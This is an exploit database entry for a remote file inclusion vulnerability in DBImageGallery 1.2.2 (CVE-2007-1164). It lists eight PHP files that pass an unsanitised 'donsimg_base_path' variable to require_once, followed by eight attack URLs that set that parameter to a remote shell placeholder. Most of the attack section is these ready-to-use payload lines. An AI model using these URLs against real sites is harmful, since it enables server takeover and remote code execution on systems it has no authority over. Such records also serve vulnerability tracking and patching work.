DBImageGallery 1.2.2 - 'donsimg_base_path' Remote File Inclusion

Author: Denven
type: webapps
platform: php
port: 
date_added: 2007-02-20 
date_updated: 2016-09-27 
verified: 1 
codes: OSVDB-34944;CVE-2007-1164;OSVDB-34943;OSVDB-34942;OSVDB-34941;OSVDB-34940;OSVDB-34939;OSVDB-34938;OSVDB-34937 
tags: 
aliases:  
screenshot_url:  
application_url: http://www.exploit-db.comDRBImageGallery.zip

DBImageGallery 1.2.2

*****************
Found by Denven *
*****************
Script: http://www.dbscripts.net/download/?file=1
*****************
ERROR:

admin/attributes.php                      require_once $donsimg_base_path
admin/images.php                          require_once $donsimg_base_path
admin/scan.php                            require_once $donsimg_base_path
includes/attributes.php                   require_once $donsimg_base_path
includes/db_utils.php                     require_once $donsimg_base_path
includes/images.php                       require_once $donsimg_base_path
includes/utils.php                        require_once $donsimg_base_path
includes/values.php                       require_once $donsimg_base_path



**************************************************************************************
RFI:

http://SITE.com/path/admin/attributes.php?donsimg_base_path=[SHELL]
http://SITE.com/path/admin/images.php?donsimg_base_path=[SHELL]
http://SITE.com/path/admin/scan.php?donsimg_base_path=[SHELL]
http://SITE.com/path/includes/attributes.php?donsimg_base_path=[SHELL]
http://SITE.com/path/includes/db_utils.php?donsimg_base_path=[SHELL]
http://SITE.com/path/includes/images.php?donsimg_base_path=[SHELL]
http://SITE.com/path/includes/utils.php?donsimg_base_path=[SHELL]
http://SITE.com/path/includes/values.php?donsimg_base_path=[SHELL]


**************************************************************************************
denven[at]gmail[dot]com

# milw0rm.com [2007-02-21]